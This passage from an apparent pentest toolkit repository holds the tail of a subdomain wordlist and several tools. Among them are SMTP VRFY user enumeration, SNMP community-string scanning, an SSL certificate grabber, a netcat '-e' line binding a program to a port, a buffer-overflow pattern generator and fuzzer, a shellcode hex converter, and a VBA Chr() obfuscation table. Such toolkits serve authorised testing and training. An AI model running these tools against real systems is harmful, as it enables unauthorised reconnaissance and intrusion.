 623 | find
 624 | finger
 625 | firewall
 626 | fix
 627 | fixes
 628 | fj
 629 | fk
 630 | fl
 631 | flash
 632 | florida
 633 | flow
 634 | fm
 635 | fo
 636 | foobar
 637 | formacion
 638 | foro
 639 | foros
 640 | fortworth
 641 | forum
 642 | forums
 643 | foto
 644 | fotos
 645 | foundry
 646 | fox
 647 | foxtrot
 648 | fr
 649 | france
 650 | frank
 651 | fred
 652 | freebsd
 653 | freebsd0
 654 | freebsd01
 655 | freebsd02
 656 | freebsd1
 657 | freebsd2
 658 | freeware
 659 | fresno
 660 | front
 661 | frontdesk
 662 | fs
 663 | fsp
 664 | ftp
 665 | ftp-
 666 | ftp0
 667 | ftp2
 668 | ftpserver
 669 | fw
 670 | fw-1
 671 | fw1
 672 | fwsm
 673 | fwsm0
 674 | fwsm01
 675 | fwsm1
 676 | g
 677 | ga
 678 | galeria
 679 | galerias
 680 | galleries
 681 | gallery
 682 | games
 683 | gamma
 684 | gandalf
 685 | gate
 686 | gatekeeper
 687 | gateway
 688 | gauss
 689 | gd
 690 | ge
 691 | gemini
 692 | general
 693 | george
 694 | georgia
 695 | germany
 696 | gf
 697 | gg
 698 | gh
 699 | gi
 700 | gl
 701 | glendale
 702 | gm
 703 | gmail
 704 | gn
 705 | go
 706 | gold
 707 | goldmine
 708 | golf
 709 | gopher
 710 | gp
 711 | gq
 712 | gr
 713 | green
 714 | group
 715 | groups
 716 | groupwise
 717 | gs
 718 | gsx
 719 | gt
 720 | gu
 721 | guest
 722 | gw
 723 | gw1
 724 | gy
 725 | h
 726 | hal
 727 | halflife
 728 | hawaii
 729 | hello
 730 | help
 731 | helpdesk
 732 | helponline
 733 | henry
 734 | hermes
 735 | hi
 736 | hidden
 737 | hk
 738 | hm
 739 | hn
 740 | hobbes
 741 | hollywood
 742 | home
 743 | homebase
 744 | homer
 745 | honeypot
 746 | honolulu
 747 | host
 748 | host1
 749 | host3
 750 | host4
 751 | host5
 752 | hotel
 753 | hotjobs
 754 | houstin
 755 | houston
 756 | howto
 757 | hp
 758 | hpov
 759 | hr
 760 | ht
 761 | http
 762 | https
 763 | hu
 764 | hub
 765 | humanresources
 766 | i
 767 | ia
 768 | ias
 769 | ibm
 770 | ibmdb
 771 | id
 772 | ida
 773 | idaho
 774 | ids
 775 | ie
 776 | iis
 777 | il
 778 | illinois
 779 | im
 780 | images
 781 | imail
 782 | imap
 783 | imap4
 784 | img
 785 | img0
 786 | img01
 787 | img02
 788 | in
 789 | inbound
 790 | inc
 791 | include
 792 | incoming
 793 | india
 794 | indiana
 795 | indianapolis
 796 | info
 797 | informix
 798 | inside
 799 | install
 800 | int
 801 | intern
 802 | internal
 803 | international
 804 | internet
 805 | intl
 806 | intranet
 807 | invalid
 808 | investor
 809 | investors
 810 | io
 811 | iota
 812 | iowa
 813 | iplanet
 814 | ipmonitor
 815 | ipsec
 816 | ipsec-gw
 817 | ipv6
 818 | ipv6.teredo
 819 | iq
 820 | ir
 821 | irc
 822 | ircd
 823 | ircserver
 824 | ireland
 825 | iris
 826 | irvine
 827 | irving
 828 | is
 829 | isa
 830 | isaserv
 831 | isaserver
 832 | ism
 833 | israel
 834 | isync
 835 | it
 836 | italy
 837 | ix
 838 | j
 839 | japan
 840 | java
 841 | je
 842 | jedi
 843 | jm
 844 | jo
 845 | jobs
 846 | john
 847 | jp
 848 | jrun
 849 | juegos
 850 | juliet
 851 | juliette
 852 | juniper
 853 | k
 854 | kansas
 855 | kansascity
 856 | kappa
 857 | kb
 858 | ke
 859 | kentucky
 860 | kerberos
 861 | keynote
 862 | kg
 863 | kh
 864 | ki
 865 | kilo
 866 | king
 867 | km
 868 | kn
 869 | knowledgebase
 870 | knoxville
 871 | koe
 872 | korea
 873 | kp
 874 | kr
 875 | ks
 876 | kw
 877 | ky
 878 | kz
 879 | l
 880 | la
 881 | lab
 882 | laboratory
 883 | labs
 884 | lambda
 885 | lan
 886 | laptop
 887 | laserjet
 888 | lasvegas
 889 | launch
 890 | lb
 891 | lc
 892 | ldap
 893 | legal
 894 | leo
 895 | li
 896 | lib
 897 | library
 898 | lima
 899 | lincoln
 900 | link
 901 | linux
 902 | linux0
 903 | linux01
 904 | linux02
 905 | linux1
 906 | linux2
 907 | lista
 908 | lists
 909 | listserv
 910 | listserver
 911 | live
 912 | lk
 913 | load
 914 | loadbalancer
 915 | local
 916 | localhost
 917 | log
 918 | log0
 919 | log01
 920 | log02
 921 | log1
 922 | log2
 923 | logfile
 924 | logfiles
 925 | logger
 926 | logging
 927 | loghost
 928 | login
 929 | logs
 930 | london
 931 | longbeach
 932 | losangeles
 933 | lotus
 934 | louisiana
 935 | lr
 936 | ls
 937 | lt
 938 | lu
 939 | luke
 940 | lv
 941 | ly
 942 | lyris
 943 | m
 944 | ma
 945 | mac
 946 | mac1
 947 | mac10
 948 | mac11
 949 | mac2
 950 | mac3
 951 | mac4
 952 | mac5
 953 | mach
 954 | macintosh
 955 | madrid
 956 | mail
 957 | mail2
 958 | mailer
 959 | mailgate
 960 | mailhost
 961 | mailing
 962 | maillist
 963 | maillists
 964 | mailroom
 965 | mailserv
 966 | mailsite
 967 | mailsrv
 968 | main
 969 | maine
 970 | maint
 971 | mall
 972 | manage
 973 | management
 974 | manager
 975 | manufacturing
 976 | map
 977 | mapas
 978 | maps
 979 | marketing
 980 | marketplace
 981 | mars
 982 | marvin
 983 | mary
 984 | maryland
 985 | massachusetts
 986 | master
 987 | max
 988 | mc
 989 | mci
 990 | md
 991 | mdaemon
 992 | me
 993 | media
 994 | member
 995 | members
 996 | memphis
 997 | mercury
 998 | merlin
 999 | messages
1000 | messenger
1001 | mg
1002 | mgmt
1003 | mh
1004 | mi
1005 | miami
1006 | michigan
1007 | mickey
1008 | midwest
1009 | mike
1010 | milwaukee
1011 | minneapolis
1012 | minnesota
1013 | mirror
1014 | mis
1015 | mississippi
1016 | missouri
1017 | mk
1018 | ml
1019 | mm
1020 | mn
1021 | mngt
1022 | mo
1023 | mobile
1024 | mobilemail
1025 | mom
1026 | monitor
1027 | monitoring
1028 | montana
1029 | moon
1030 | moscow
1031 | movies
1032 | mozart
1033 | mp
1034 | mp3
1035 | mpeg
1036 | mpg
1037 | mq
1038 | mr
1039 | mrtg
1040 | ms
1041 | ms-exchange
1042 | ms-sql
1043 | msexchange
1044 | mssql
1045 | mssql0
1046 | mssql01
1047 | mssql1
1048 | mt
1049 | mta
1050 | mtu
1051 | mu
1052 | multimedia
1053 | music
1054 | mv
1055 | mw
1056 | mx
1057 | my
1058 | mysql
1059 | mysql0
1060 | mysql01
1061 | mysql1
1062 | mz
1063 | n
1064 | na
1065 | name
1066 | names
1067 | nameserv
1068 | nameserver
1069 | nas
1070 | nashville
1071 | nat
1072 | nc
1073 | nd
1074 | nds
1075 | ne
1076 | nebraska
1077 | neptune
1078 | net
1079 | netapp
1080 | netdata
1081 | netgear
1082 | netmeeting
1083 | netscaler
1084 | netscreen
1085 | netstats
1086 | network
1087 | nevada
1088 | new
1089 | newhampshire
1090 | newjersey
1091 | newmexico
1092 | neworleans
1093 | news
1094 | newsfeed
1095 | newsfeeds
1096 | newsgroups
1097 | newton
1098 | newyork
1099 | newzealand
1100 | nf
1101 | ng
1102 | nh
1103 | ni
1104 | nigeria
1105 | nj
1106 | nl
1107 | nm
1108 | nms
1109 | nntp
1110 | no
1111 | node
1112 | nokia
1113 | nombres
1114 | nora
1115 | north
1116 | northcarolina
1117 | northdakota
1118 | northeast
1119 | northwest
1120 | noticias
1121 | novell
1122 | november
1123 | np
1124 | nr
1125 | ns
1126 | ns-
1127 | ns0
1128 | ns01
1129 | ns02
1130 | ns1
1131 | ns2
1132 | ns3
1133 | ns4
1134 | ns5
1135 | nt
1136 | nt4
1137 | nt40
1138 | ntmail
1139 | ntp
1140 | ntserver
1141 | nu
1142 | null
1143 | nv
1144 | ny
1145 | nz
1146 | o
1147 | oakland
1148 | ocean
1149 | odin
1150 | office
1151 | offices
1152 | oh
1153 | ohio
1154 | ok
1155 | oklahoma
1156 | oklahomacity
1157 | old
1158 | om
1159 | omaha
1160 | omega
1161 | omicron
1162 | online
1163 | ontario
1164 | open
1165 | openbsd
1166 | openview
1167 | operations
1168 | ops
1169 | ops0
1170 | ops01
1171 | ops02
1172 | ops1
1173 | ops2
1174 | opsware
1175 | or
1176 | oracle
1177 | orange
1178 | order
1179 | orders
1180 | oregon
1181 | orion
1182 | orlando
1183 | oscar
1184 | out
1185 | outbound
1186 | outgoing
1187 | outlook
1188 | outside
1189 | ov
1190 | owa
1191 | owa01
1192 | owa02
1193 | owa1
1194 | owa2
1195 | ows
1196 | oxnard
1197 | p
1198 | pa
1199 | page
1200 | pager
1201 | pages
1202 | paginas
1203 | papa
1204 | paris
1205 | parners
1206 | partner
1207 | partners
1208 | patch
1209 | patches
1210 | paul
1211 | payroll
1212 | pbx
1213 | pc
1214 | pc01
1215 | pc1
1216 | pc10
1217 | pc101
1218 | pc11
1219 | pc12
1220 | pc13
1221 | pc14
1222 | pc15
1223 | pc16
1224 | pc17
1225 | pc18
1226 | pc19
1227 | pc2
1228 | pc20
1229 | pc21
1230 | pc22
1231 | pc23
1232 | pc24
1233 | pc25
1234 | pc26
1235 | pc27
1236 | pc28
1237 | pc29
1238 | pc3
1239 | pc30
1240 | pc31
1241 | pc32
1242 | pc33
1243 | pc34
1244 | pc35
1245 | pc36
1246 | pc37
1247 | pc38
1248 | pc39
1249 | pc4
1250 | pc40
1251 | pc41
1252 | pc42
1253 | pc43
1254 | pc44
1255 | pc45
1256 | pc46
1257 | pc47
1258 | pc48
1259 | pc49
1260 | pc5
1261 | pc50
1262 | pc51
1263 | pc52
1264 | pc53
1265 | pc54
1266 | pc55
1267 | pc56
1268 | pc57
1269 | pc58
1270 | pc59
1271 | pc6
1272 | pc60
1273 | pc7
1274 | pc8
1275 | pc9
1276 | pcmail
1277 | pda
1278 | pdc
1279 | pe
1280 | pegasus
1281 | pennsylvania
1282 | peoplesoft
1283 | personal
1284 | pf
1285 | pg
1286 | pgp
1287 | ph
1288 | phi
1289 | philadelphia
1290 | phoenix
1291 | phoeniz
1292 | phone
1293 | phones
1294 | photos
1295 | pi
1296 | pics
1297 | pictures
1298 | pink
1299 | pipex-gw
1300 | pittsburgh
1301 | pix
1302 | pk
1303 | pki
1304 | pl
1305 | plano
1306 | platinum
1307 | pluto
1308 | pm
1309 | pm1
1310 | pn
1311 | po
1312 | policy
1313 | polls
1314 | pop
1315 | pop3
1316 | portal
1317 | portals
1318 | portfolio
1319 | portland
1320 | post
1321 | postales
1322 | postoffice
1323 | ppp1
1324 | ppp10
1325 | ppp11
1326 | ppp12
1327 | ppp13
1328 | ppp14
1329 | ppp15
1330 | ppp16
1331 | ppp17
1332 | ppp18
1333 | ppp19
1334 | ppp2
1335 | ppp20
1336 | ppp21
1337 | ppp3
1338 | ppp4
1339 | ppp5
1340 | ppp6
1341 | ppp7
1342 | ppp8
1343 | ppp9
1344 | pptp
1345 | pr
1346 | prensa
1347 | press
1348 | printer
1349 | printserv
1350 | printserver
1351 | priv
1352 | privacy
1353 | private
1354 | problemtracker
1355 | products
1356 | profiles
1357 | project
1358 | projects
1359 | promo
1360 | proxy
1361 | prueba
1362 | pruebas
1363 | ps
1364 | psi
1365 | pss
1366 | pt
1367 | pub
1368 | public
1369 | pubs
1370 | purple
1371 | pw
1372 | py
1373 | q
1374 | qa
1375 | qmail
1376 | qotd
1377 | quake
1378 | quebec
1379 | queen
1380 | quotes
1381 | r
1382 | r01
1383 | r02
1384 | r1
1385 | r2
1386 | ra
1387 | radio
1388 | radius
1389 | rapidsite
1390 | raptor
1391 | ras
1392 | rc
1393 | rcs
1394 | rd
1395 | re
1396 | read
1397 | realserver
1398 | recruiting
1399 | red
1400 | redhat
1401 | ref
1402 | reference
1403 | reg
1404 | register
1405 | registro
1406 | registry
1407 | regs
1408 | relay
1409 | rem
1410 | remote
1411 | remstats
1412 | reports
1413 | research
1414 | reseller
1415 | reserved
1416 | resumenes
1417 | rho
1418 | rhodeisland
1419 | ri
1420 | ris
1421 | rmi
1422 | ro
1423 | robert
1424 | romeo
1425 | root
1426 | rose
1427 | route
1428 | router
1429 | router1
1430 | rs
1431 | rss
1432 | rtelnet
1433 | rtr
1434 | rtr01
1435 | rtr1
1436 | ru
1437 | rune
1438 | rw
1439 | rwhois
1440 | s
1441 | s1
1442 | s2
1443 | sa
1444 | sac
1445 | sacramento
1446 | sadmin
1447 | safe
1448 | sales
1449 | saltlake
1450 | sam
1451 | san
1452 | sanantonio
1453 | sandiego
1454 | sanfrancisco
1455 | sanjose
1456 | saskatchewan
1457 | saturn
1458 | sb
1459 | sbs
1460 | sc
1461 | scanner
1462 | schedules
1463 | scotland
1464 | scotty
1465 | sd
1466 | se
1467 | search
1468 | seattle
1469 | sec
1470 | secret
1471 | secure
1472 | secured
1473 | securid
1474 | security
1475 | sendmail
1476 | seri
1477 | serv
1478 | serv2
1479 | server
1480 | server1
1481 | servers
1482 | service
1483 | services
1484 | servicio
1485 | servidor
1486 | setup
1487 | sg
1488 | sh
1489 | shared
1490 | sharepoint
1491 | shareware
1492 | shipping
1493 | shop
1494 | shoppers
1495 | shopping
1496 | si
1497 | siebel
1498 | sierra
1499 | sigma
1500 | signin
1501 | signup
1502 | silver
1503 | sim
1504 | sirius
1505 | site
1506 | sj
1507 | sk
1508 | skywalker
1509 | sl
1510 | slackware
1511 | slmail
1512 | sm
1513 | smc
1514 | sms
1515 | smtp
1516 | smtphost
1517 | sn
1518 | sniffer
1519 | snmp
1520 | snmpd
1521 | snoopy
1522 | snort
1523 | so
1524 | soap
1525 | socal
1526 | software
1527 | sol
1528 | solaris
1529 | solutions
1530 | soporte
1531 | source
1532 | sourcecode
1533 | sourcesafe
1534 | south
1535 | southcarolina
1536 | southdakota
1537 | southeast
1538 | southwest
1539 | spain
1540 | spam
1541 | spider
1542 | spiderman
1543 | splunk
1544 | spock
1545 | spokane
1546 | springfield
1547 | sprint
1548 | sqa
1549 | sql
1550 | sql0
1551 | sql01
1552 | sql1
1553 | sql7
1554 | sqlserver
1555 | squid
1556 | sr
1557 | ss
1558 | ssh
1559 | ssl
1560 | ssl0
1561 | ssl01
1562 | ssl1
1563 | st
1564 | staff
1565 | stage
1566 | staging
1567 | start
1568 | stat
1569 | static
1570 | statistics
1571 | stats
1572 | stlouis
1573 | stock
1574 | storage
1575 | store
1576 | storefront
1577 | streaming
1578 | stronghold
1579 | strongmail
1580 | studio
1581 | submit
1582 | subversion
1583 | sun
1584 | sun0
1585 | sun01
1586 | sun02
1587 | sun1
1588 | sun2
1589 | superman
1590 | supplier
1591 | suppliers
1592 | support
1593 | sv
1594 | sw
1595 | sw0
1596 | sw01
1597 | sw1
1598 | sweden
1599 | switch
1600 | switzerland
1601 | sy
1602 | sybase
1603 | sydney
1604 | sysadmin
1605 | sysback
1606 | syslog
1607 | syslogs
1608 | system
1609 | sz
1610 | t
1611 | tacoma
1612 | taiwan
1613 | talk
1614 | tampa
1615 | tango
1616 | tau
1617 | tc
1618 | tcl
1619 | td
1620 | team
1621 | tech
1622 | technology
1623 | techsupport
1624 | telephone
1625 | telephony
1626 | telnet
1627 | temp
1628 | tennessee
1629 | terminal
1630 | terminalserver
1631 | termserv
1632 | test
1633 | test2k
1634 | testajax
1635 | testasp
1636 | testaspnet
1637 | testbed
1638 | testcf
1639 | testing
1640 | testjsp
1641 | testlab
1642 | testlinux
1643 | testphp
1644 | testserver
1645 | testsite
1646 | testsql
1647 | testxp
1648 | texas
1649 | tf
1650 | tftp
1651 | tg
1652 | th
1653 | thailand
1654 | theta
1655 | thor
1656 | tienda
1657 | tiger
1658 | time
1659 | titan
1660 | tivoli
1661 | tj
1662 | tk
1663 | tm
1664 | tn
1665 | to
1666 | tokyo
1667 | toledo
1668 | tom
1669 | tool
1670 | tools
1671 | toplayer
1672 | toronto
1673 | tour
1674 | tp
1675 | tr
1676 | tracker
1677 | train
1678 | training
1679 | transfers
1680 | trinidad
1681 | trinity
1682 | ts
1683 | ts1
1684 | tt
1685 | tucson
1686 | tulsa
1687 | tunnel
1688 | tv
1689 | tw
1690 | tx
1691 | tz
1692 | u
1693 | ua
1694 | uddi
1695 | ug
1696 | uk
1697 | um
1698 | uniform
1699 | union
1700 | unitedkingdom
1701 | unitedstates
1702 | unix
1703 | unixware
1704 | update
1705 | updates
1706 | upload
1707 | ups
1708 | upsilon
1709 | uranus
1710 | urchin
1711 | us
1712 | usa
1713 | usenet
1714 | user
1715 | users
1716 | ut
1717 | utah
1718 | utilities
1719 | uy
1720 | uz
1721 | v
1722 | v6
1723 | va
1724 | vader
1725 | vantive
1726 | vault
1727 | vc
1728 | ve
1729 | vega
1730 | vegas
1731 | vend
1732 | vendors
1733 | venus
1734 | vermont
1735 | vg
1736 | vi
1737 | victor
1738 | video
1739 | videos
1740 | viking
1741 | violet
1742 | vip
1743 | virginia
1744 | vista
1745 | vm
1746 | vmserver
1747 | vmware
1748 | vn
1749 | vnc
1750 | voice
1751 | voicemail
1752 | voip
1753 | voyager
1754 | vpn
1755 | vpn0
1756 | vpn01
1757 | vpn02
1758 | vpn1
1759 | vpn2
1760 | vt
1761 | vu
1762 | w
1763 | w1
1764 | w2
1765 | w3
1766 | wa
1767 | wais
1768 | wallet
1769 | wam
1770 | wan
1771 | wap
1772 | warehouse
1773 | washington
1774 | wc3
1775 | web
1776 | webaccess
1777 | webadmin
1778 | webalizer
1779 | webboard
1780 | webcache
1781 | webcam
1782 | webcast
1783 | webdev
1784 | webdocs
1785 | webfarm
1786 | webhelp
1787 | weblib
1788 | weblogic
1789 | webmail
1790 | webmaster
1791 | webproxy
1792 | webring
1793 | webs
1794 | webserv
1795 | webserver
1796 | webservices
1797 | website
1798 | websites
1799 | websphere
1800 | websrv
1801 | websrvr
1802 | webstats
1803 | webstore
1804 | websvr
1805 | webtrends
1806 | welcome
1807 | west
1808 | westvirginia
1809 | wf
1810 | whiskey
1811 | white
1812 | whois
1813 | wi
1814 | wichita
1815 | wiki
1816 | wililiam
1817 | win
1818 | win01
1819 | win02
1820 | win1
1821 | win2
1822 | win2000
1823 | win2003
1824 | win2k
1825 | win2k3
1826 | windows
1827 | windows01
1828 | windows02
1829 | windows1
1830 | windows2
1831 | windows2000
1832 | windows2003
1833 | windowsxp
1834 | wingate
1835 | winnt
1836 | winproxy
1837 | wins
1838 | winserve
1839 | winxp
1840 | wire
1841 | wireless
1842 | wisconsin
1843 | wlan
1844 | wordpress
1845 | work
1846 | world
1847 | wpad
1848 | write
1849 | ws
1850 | ws1
1851 | ws10
1852 | ws11
1853 | ws12
1854 | ws13
1855 | ws2
1856 | ws3
1857 | ws4
1858 | ws5
1859 | ws6
1860 | ws7
1861 | ws8
1862 | ws9
1863 | wusage
1864 | wv
1865 | ww
1866 | www
1867 | www-
1868 | www-01
1869 | www-02
1870 | www-1
1871 | www-2
1872 | www-int
1873 | www0
1874 | www01
1875 | www02
1876 | www1
1877 | www2
1878 | www3
1879 | wwwchat
1880 | wwwdev
1881 | wwwmail
1882 | wy
1883 | wyoming
1884 | x
1885 | x-ray
1886 | xi
1887 | xlogan
1888 | xmail
1889 | xml
1890 | xp
1891 | y
1892 | yankee
1893 | ye
1894 | yellow
1895 | young
1896 | yt
1897 | yu
1898 | z
1899 | z-log
1900 | za
1901 | zebra
1902 | zera
1903 | zeus
1904 | zlog
1905 | zm
1906 | zulu
1907 | zw
1908 | 


--------------------------------------------------------------------------------
/enumeration/smtp/vrfy_enum.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import socket
 4 | import sys
 5 | if len(sys.argv) != 3:
 6 | 	print "Usage: %s <hostname> <username>" % sys.argv[0]
 7 | 	sys.exit(1)
 8 | 
 9 | # Create a socket
10 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 | # Connect to the Server
12 | connect=s.connect((sys.argv[1],25))
13 | # Receive the banner
14 | banner=s.recv(1024)
15 | # print banner
16 | # VRFY a user
17 | s.send('VRFY ' + sys.argv[2] + '\r\n')
18 | result=s.recv(1024)
19 | if result == "502 Use HELO/EHLO first.":
20 | 	print "WARN: Server returned:\n%s" % result
21 | 	print "INFO: Sending HELO message"
22 | 	s.send ('HELO vrfytester' + '\r\n')
23 | 	result=s.recv(1024)
24 | 	print "INFO: Retrying VRFY request"
25 | 	s.send('VRFY ' + sys.argv[2] + '\r\n')
26 | 	result=s.recv(1024)
27 | 	if result == "502 VRFY disallowed.":
28 | 		print "ERR: VRFY disallowed on server!"
29 | 		s.close()
30 | 		sys.exit(2)
31 | 	else:
32 | 		print result
33 | elif result.split(' ', 1)[0] == "550":
34 | 	print "WARN: Username unknown, server returned:\n%s" % result
35 | 	sys.exit(2)
36 | else:
37 | 	print result
38 | 
39 | # Close the socket
40 | s.close()
41 | sys.exit(0)
42 | 


--------------------------------------------------------------------------------
/enumeration/smtp/vrfy_wrapper.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | for host in $(cat smtp_hosts); do
4 | 	echo "Usernames VRFYed for $host"
5 | 	for name in $(cat namelist.txt); do
6 | 		./vrfy_enum.py $host $name |grep 250;
7 | 	done
8 | done
9 | 


--------------------------------------------------------------------------------
/enumeration/snmp/snmp_checker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | if [ -z "$1" ]; then
 3 |         echo "[*] Automagically enumerates a given network range for hosts and tries a given set of community strings"
 4 |         echo "[*] Dumps the output to hosts/<host ip address>/snmp_check_info"
 5 |         echo "[*] Usage    : $0 <scan range> [/path/to/file/with/snmp/strings]"
 6 | exit 1
 7 | fi
 8 | 
 9 | onesixtyone -c $community_file -i $scan_range_file | grep 192. |cut -d " " -f 1| tee snmp_hosts
10 | # snmpcheck -c public -t 192.168.15.203
11 | for string in $(cat community_file); do
12 | 	for host in $(cat snmp_hosts); do
13 | 		snmpcheck -c $string -t $host |tee hosts/$host/snmp_check_info;
14 | 	done
15 | done
16 | 


--------------------------------------------------------------------------------
/enumeration/ssl/ssl_cert_details.py:
--------------------------------------------------------------------------------
 1 | import argparse, ssl, sys, OpenSSL
 2 | 
 3 | desc = "Grabs SSL certificate details from a running SSL service"
 4 | parser = argparse.ArgumentParser(prog='get_ssl_cert', usage=sys.argv[0] + ' [options]', description=desc)
 5 | parser.add_argument('-i', "--hostname", type=str, help="Hostname/ip of SSL service to query", required=True)
 6 | parser.add_argument('-p', "--port", type=int, help="Port of TCP/IP SSL service", required=False, default=443)
 7 | args=parser.parse_args()
 8 | 
 9 | # Formatting prep
10 | fldmap = (
11 | 	'Attribute', 's',
12 | 	'Value', 's',)
13 | 
14 | head = '\t\t\t'.join(fldmap[0:len(fldmap):2])
15 | fmt = '\t\t\t'.join(['{' + '{0}:{1}'.format(col,fmt) + '}' \
16 | 	for col, fmt in zip( \
17 | 		fldmap[0:len(fldmap):2], \
18 | 		fldmap[1:len(fldmap):2])])
19 | 
20 | # Grab the certificate
21 | cert = ssl.get_server_certificate((args.hostname, args.port))
22 | x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
23 | 
24 | # Convert the class
25 | subject = x509.get_subject()
26 | issuer = x509.get_issuer()
27 | 
28 | # Output formatted details
29 | print("Certificate details for: " + args.hostname + '\n')
30 | print head
31 | print "-------------------------------------------"
32 | print fmt.format(Attribute='Common Name:', Value=subject.commonName)
33 | print fmt.format(Attribute='Subject Organization:', Value=subject.organizationName)
34 | print fmt.format(Attribute='Subject Organizational Unit:', Value=subject.organizationalUnitName)
35 | print fmt.format(Attribute='Issuer Organization:',Value=issuer.organizationName)
36 | print fmt.format(Attribute='Issuer CN:', Value=issuer.commonName)
37 | 


--------------------------------------------------------------------------------
/exploit-development/auxillary/host_pwnable.sh:
--------------------------------------------------------------------------------
 1 | # Used to host a pwnable locally when practicing with pwnables
 2 | # Und3rf10w
 3 | 
 4 | if [ "$#" -ne 2 ]; then
 5 | 	echo "Usage: $0 <port to host on> </path/to/executeable>"
 6 | 	exit 
 7 | fi
 8 | 
 9 | nc -l -p $1 -e $2
10 | 


--------------------------------------------------------------------------------
/exploit-development/auxillary/pattern.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | # Taken from: https://github.com/blackr8t/pwn-tools/blob/master/pattern.py
 3 | # Modified by Und3rf10w
 4 | 
 5 | 
 6 | import sys
 7 | import argparse
 8 | from string import uppercase, lowercase, digits
 9 | 
10 | MAX_PATTERN_LENGTH = 20280
11 | 
12 | def pattern_gen(length):
13 |     """
14 |     Generate a pattern of a given length up to a maximum
15 |     of 20280 - after this the pattern would repeat
16 |     """
17 |     if length >= MAX_PATTERN_LENGTH:
18 |         print 'ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH
19 |         sys.exit(1)
20 | 
21 |     pattern = ''
22 |     for upper in uppercase:
23 |         for lower in lowercase:
24 |             for digit in digits:
25 |                 if len(pattern) < length:
26 |                     pattern += upper+lower+digit
27 |                 else:
28 |                     out = pattern[:length]
29 |                     print out
30 |                     return
31 | 
32 | def pattern_search(search_pattern):
33 |     """
34 |     Search for search_pattern in pattern. Convert from hex if given as such.
35 |     """
36 |     needle = search_pattern
37 |     if len(needle) == 10 or len(needle) == 8:
38 |         try:
39 |             # (EIP = 0x41326641) Value can be given as either 0x41326641 or 41326641
40 |             if needle.startswith('0x'):
41 |                 # Strip off '0x', convert to ASCII and reverse
42 |                 needle = needle[2:].decode('hex')
43 |                 needle = needle[::-1]
44 |             else:
45 |                 needle = needle.decode('hex')
46 |                 needle = needle[::-1]
47 |         except TypeError as e:
48 |             print 'Unable to convert hex input:', e
49 |             sys.exit(1)
50 | 
51 |     haystack = ''
52 |     for upper in uppercase:
53 |         for lower in lowercase:
54 |             for digit in digits:
55 |                 haystack += upper+lower+digit
56 |                 found_at = haystack.find(needle)
57 |                 if found_at > -1:
58 |                     print('Pattern %s first occurrence at position %d in pattern.' %
59 |                           (search_pattern, found_at))
60 |                     return
61 | 
62 |     print ('Couldn\'t find %s (%s) anywhere in the pattern.' %
63 |            (search_pattern, needle))
64 | 
65 | 
66 | if __name__ == '__main__':
67 |     parser = argparse.ArgumentParser(prog=str(sys.argv[0]), usage='%(prog)s [options]', description='Pattern Generator and Searcher')
68 | 
69 |     parser.add_argument('-s', help='Search for given pattern or address (0x41326641 || 41326641 || A2fA', dest='search_pattern', required=False)
70 |     parser.add_argument('-g', help='Generate pattern of length', dest='length', required=False)
71 | 
72 |     args = parser.parse_args()
73 |     try:
74 |         if args.search_pattern and args.length:
75 |             print "ERROR: both -g and -s given"
76 |         elif args.search_pattern:
77 |             pattern_search(args.search_pattern)
78 |         else:
79 |             pattern_gen(int(args.length))
80 |     except:
81 |         parser.print_help()
82 |         sys.exit(0)


--------------------------------------------------------------------------------
/exploit-development/auxillary/shellcode_to_hex.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | originalfile=$1
 4 | outputfile=$2
 5 | 
 6 | if [ "$#" -lt 1 ]; then
 7 |     echo -e "Converts a binary to raw hexcode\n$0: </path/to/bin> [/path/to/output/file]"
 8 |     exit 0
 9 | fi
10 | 
11 | if [[ -z "$outputfile" ]]; then
12 |     hexdump -C $originalfile | grep -v $(hexdump -C $originalfile | tail -n 1) | cut -d " " -f3-19 | sed 's/ //g' | tr -d '\n'
13 | else
14 |     hexdump -C $originalfile | grep -v $(hexdump -C $originalfile | tail -n 1) | cut -d " " -f3-19 | sed 's/ //g' | tr -d '\n' |tee $outputfile
15 | fi
16 | 
17 | echo -e "\n"
18 | 
19 | 


--------------------------------------------------------------------------------
/exploit-development/fuzzers/network_service_fuzzer.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # Simple fuzz against a target
 3 | import socket
 4 | from sys import exit,argv
 5 | 
 6 | if len(argv) < 2:
 7 | 	print  "Performs a simple fuzz against a target"
 8 | 	print "Usage: %s <Target IP Address/hostname> <Target Port>" % str(argv[0])
 9 | 	exit(1)
10 | 
11 | #Create an arry of buffers, from 10 to 2000, with increments of 20.
12 | buffer=["A"]
13 | counter=100
14 | while len(buffer) <= 30:
15 | 	buffer.append("A"*counter)
16 | 	counter=counter+200
17 | 
18 | for string in buffer:
19 | 	print "Fuzzing %s:%s with %s bytes" % (str(argv[1]),int(argv[2]),len(string))
20 | 	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
21 | 	connect=s.connect((str(argv[1]),int(argv[2])))
22 | 	# This next part depends on whatever the RFC is for what you're trying to 
23 | 	# exploit. Up to you to put the 'string' in the right place. Be sure to
24 | 	# receive bytes after sending anything.
25 | 	s.recv(1024) # Grab the banner, do not remove
26 | 	s.send(string + "\r\n") # Sends your evil buffer as 'string'
27 | 	s.send('QUIT\r\n') # Replace 'QUIT' with whatever ends your session
28 | 	s.close()
29 | 


--------------------------------------------------------------------------------
/exploit-development/obfuscators/vba_str_to_chr/chr_table.txt:
--------------------------------------------------------------------------------
 1 | Chr(33) !
 2 | Chr(34) "
 3 | Chr(35) #
 4 | Chr(36) $
 5 | Chr(37) %
 6 | Chr(38) &
 7 | Chr(39) '
 8 | Chr(40) (
 9 | Chr(41) )
10 | Chr(42) *
11 | Chr(43) +
12 | Chr(44) ,
13 | Chr(45) -
14 | Chr(46) .
15 | Chr(47) /
16 | Chr(48) 0
17 | Chr(49) 1
18 | Chr(50) 2
19 | Chr(51) 3
20 | Chr(52) 4
21 | Chr(53) 5
22 | Chr(54) 6
23 | Chr(55) 7
24 | Chr(56) 8
25 | Chr(57) 9
26 | Chr(58) :
27 | Chr(59) ;
28 | Chr(60) <
29 | Chr(61) =
30 | Chr(62) >
31 | Chr(63) ?
